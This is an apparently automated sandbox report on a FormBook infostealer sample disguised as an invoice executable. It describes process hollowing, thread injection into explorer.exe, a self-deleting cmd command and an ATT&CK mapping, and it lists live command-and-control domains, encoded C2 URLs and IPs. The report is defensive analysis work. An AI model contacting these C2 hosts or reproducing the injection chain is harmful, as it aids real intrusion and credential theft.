Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]	15_2_04D952A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]	15_2_04D952A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D952A5 mov eax, dword ptr fs:[00000030h]	15_2_04D952A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E4B260 mov eax, dword ptr fs:[00000030h]	15_2_04E4B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E4B260 mov eax, dword ptr fs:[00000030h]	15_2_04E4B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04E68A62 mov eax, dword ptr fs:[00000030h]	15_2_04E68A62
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]	15_2_04D99240
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]	15_2_04D99240
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]	15_2_04D99240
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04D99240 mov eax, dword ptr fs:[00000030h]	15_2_04D99240
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DD927A mov eax, dword ptr fs:[00000030h]	15_2_04DD927A

Source: C:\Users\user\Desktop\INv02938727.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.sequenceanalytica.com
Source: C:\Windows\explorer.exe	Network Connect: 107.165.40.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.manifestarz.com
Source: C:\Windows\explorer.exe	Domain query: www.funtimespheres.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\INv02938727.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\INv02938727.exe	Thread register set: target process: 3292	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Thread register set: target process: 3292	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3292	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\INv02938727.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\INv02938727.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: B90000

Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe	Process created: C:\Users\user\Desktop\INv02938727.exe C:\Users\user\Desktop\INv02938727.exe	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INv02938727.exe'	Jump to behavior

Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.511763948.0000000001400000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.511612749.0000000003620000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.510673235.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000003.00000000.276768053.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Source: C:\Users\user\Desktop\INv02938727.exe	Queries volume information: C:\Users\user\Desktop\INv02938727.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	Input Capture1	Process Discovery2	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection512	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INv02938727.exe	61%	Virustotal		Browse
INv02938727.exe	38%	Metadefender		Browse
INv02938727.exe	69%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
INv02938727.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.INv02938727.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.funtimespheres.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.sequenceanalytica.com/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg==	0%	Avira URL Cloud	safe
http://www.funtimespheres.com/kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
www.hometowncashbuyersgroup.com/kkt/	0%	Avira URL Cloud	safe
http://www.manifestarz.com/kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.funtimespheres.com	107.165.40.251	true	true	0%, Virustotal, Browse	unknown
manifestarz.com	34.102.136.180	true	false		unknown
sequenceanalytica.com	184.168.131.241	true	true		unknown
www.sequenceanalytica.com	unknown	unknown	true		unknown
www.manifestarz.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.sequenceanalytica.com/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg==	true	Avira URL Cloud: safe	unknown
http://www.funtimespheres.com/kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0	true	Avira URL Cloud: safe	unknown
www.hometowncashbuyersgroup.com/kkt/	true	Avira URL Cloud: safe	low
http://www.manifestarz.com/kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ==	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000000.269026840.0000000006870000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	false		high
http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9	control.exe, 0000000F.00000002.515402628.000000000578F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	INv02938727.exe, 00000001.00000002.250096553.00000000026D1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
107.165.40.251	www.funtimespheres.com	United States	18779	EGIHOSTINGUS	true
34.102.136.180	manifestarz.com	United States	15169	GOOGLEUS	false
184.168.131.241	sequenceanalytica.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	411836
Start date:	12.05.2021
Start time:	07:30:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INv02938727.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/1@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 9.5% (good quality ratio 8.5%) Quality average: 73.3% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 85 Number of non-executed functions: 157
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Simulations

Behavior and APIs

Time	Type	Description
07:31:21	API Interceptor	2x Sleep call for process: INv02938727.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
184.168.131.241	ProForma Invoice 20210510.exe	Get hash	malicious	Browse	www.reservesunbeds.com/u8nw/?yVUx=0BIXczdHaL8h5fn&hb8Tz=k2CKzalxf+HTI/YA5ZUZEbPplHxW2QsGEOhR0/8w4ZbDPb6D4jRkh7SQnOJYmVIWFsdJ
	PO-UTITECH 0511.exe	Get hash	malicious	Browse	www.youporn-live.net/sve/?hL=-Z3dvB&0nK83v=C8vvv0MaX2y/U2Z3Q9rasdODAQyMwmTqNTEWmqcd52/p7ch4zX9D9XByyfQTmXdQf7CQjqgJug==
	POI09876OIUY.exe	Get hash	malicious	Browse	www.ssssummit.com/uv34/?9rx=WMQTG0rumw6bKas1ntyyM+QsxkhHxu1ZUcBmNY6ij7cyCWSVhqmkPYQs9C/7EVYcnBE0&bJ=_P2pFHQpqJUh
	4si5VtPNTe.exe	Get hash	malicious	Browse	www.brlnathletics.com/bucw/?APw8=MCIZYDzPkuscjpMKn6eGoQ/RcoYF14tLcsdPKcaWzW+X8DCZGW/2r27VfqhEjcQn85UoKzeBLw==&b62T=5jlLiNy09
	invscan052021.exe	Get hash	malicious	Browse	www.schmelzens.com/ued5/?5jRt=mdMCgS9ILlmCGgqJcZiXF4nHlR4RxT7ynU5KvIund6ihpo8hKpkex0rM9NCAHKrGECmZ&2dTH=c6AhPR10EV7lG
	da.exe	Get hash	malicious	Browse	www.palomachurch.com/8u3b/?dZ8=BT0h&hDKxoPS=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU7vIR5fuSTVT5I6wDQ==
	Payment.xlsx	Get hash	malicious	Browse	www.ottawahomevalues.info/8u3b/?zh=xUmcyzOh4HdFuvhunHHAKcZZd7JmKNqhEswdgXWKPEcA2epsJKzScQzpRfSI4u1UmTOkNQ==&BL3=jFNt_dFXS
	PURCHASE ORDER 5112101.xlsx	Get hash	malicious	Browse	www.myrootsandtrees.com/bucw/?btx=2DQmETE5ym4XCRWr28zmwwOJR5akFTB0jDotWvpECgLZnABSzS3kskU/ZtiFd8SyHqCl+w==&LzrL=u2M8sjUhfhtp-z
	Materialliste f#U00fcr Angebot.exe	Get hash	malicious	Browse	www.universallypc.com/mbg/?d4tTFV0x=JHtrtDQJDTvHmQjdlZxCkdFPYzqLg9GX2wZONh07d53HiePR7Au08rIVTnC7FKbvwxp0DBK+2w==&vP=9rQPzxEXvpg8-Jrp
	Purchase Order.exe	Get hash	malicious	Browse	www.xn--demirelik-u3a.com/u8nw/?wJB=-ZLXOP0XzvBHZPRp&jZhtajbP=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J
	New Order.exe	Get hash	malicious	Browse	www.britainblog.com/un8c/?a2MLWLu=ScSc7+wN2fhzbElO1qeWCW9UaeY5Q5s50OV0RzK60v9iEHECxnAHbwg3oRc1uopK9S++&l4=1bNDCf9Pbhw
	FY9Z5TR6rr.exe	Get hash	malicious	Browse	www.myrootsandtrees.com/bucw/?4hlPBD=2DQmETE8yh4TCBan08zmwwOJR5akFTB0jDw9Ks1FGALYnxtU0Cmo6gs9aLiDFdK6Lc2EnGtSNQ==&l0GD1=xBZDi6rpmLdp-
	PURCHASE ORDER.xlsx	Get hash	malicious	Browse	www.no-dietdiet.com/bucw/?e6=dxodHDGP&zdM0JRXx=AaevXC6Zw/dWc9ErEUUud//xoPiFgQsvnIBpIpcw4NMsFbTc+swprThfuXKMl6XX0OSdQw==
	cks.exe	Get hash	malicious	Browse	www.xn--demirelik-u3a.com/u8nw/?f0=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThFl1EB/LkRBfGe9jhg==&6l6x=E4ClVdU
	4LkSpeVqKR.exe	Get hash	malicious	Browse	www.montcoimmigrationlawyer.com/uoe8/?rDHpw=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&V2=LhqpTfJ8
	0a97784c_by_Libranalysis.xlsx	Get hash	malicious	Browse	www.leafylyfe.com/et9g/?BZ6=TF/YS3LdfnvKlPm037wYtLAt8WY6EQJ7LI+z0LNg8R7H3LFT4rrA/oRIWqbTaqJ76YkP/g==&bdC=7njp7th
	new order.xlsx	Get hash	malicious	Browse	www.montcoimmigrationlawyer.com/uoe8/?PbvtUz=DVW7OxuWilp3hUkhBzIJzGfsiMq3vXOqW3XcgnFXnAhOJxKbpl47XK0K/rgsfP0Uf/nXgQ==&-Z=zVeT
	Order Euro 890,000.exe	Get hash	malicious	Browse	www.anvistanes.com/nbg/?AnE=N0DpoDyPy2&GzuDf=n4dYPyDMx0k3VV9rtAXeD+dEmxGAmcHEEuMb7hMO7KemGcZmCd/seF3bHBRuXqx2nn1q
	Request for Quotation.exe	Get hash	malicious	Browse	www.xn--demirelik-u3a.com/u8nw/?K8b8q=AbsdphHPUnHTPv7&Q2M=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J
	NEW ODER.exe	Get hash	malicious	Browse	www.privat-livecam.net/dxe/?Rl=ZoCaUCEqY6gzp5oJRDYIR6dKJfPIlGszBOOrarTzvY3McW8xaXiDg62sxdfo0BcngbHw&EvU80d=fbWpjHI8A8

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-26496-GO-DADDY-COM-LLCUS	ouCeNMzxAW8tbEx.exe	Get hash	malicious	Browse	166.62.10.181
	551f47ac_by_Libranalysis.xlsm	Get hash	malicious	Browse	198.12.154.178
	export of document 555091.xlsm	Get hash	malicious	Browse	45.40.135.135
	fax 4044.xlsm	Get hash	malicious	Browse	198.12.154.178
	generated check 8460.xlsm	Get hash	malicious	Browse	198.12.154.178
	export of bill 896621.xlsm	Get hash	malicious	Browse	198.12.154.178
	invoice 85046.xlsm	Get hash	malicious	Browse	198.12.154.178
	bill 04050.xlsm	Get hash	malicious	Browse	198.12.154.178
	copy of payment 0535.xlsm	Get hash	malicious	Browse	45.40.135.135
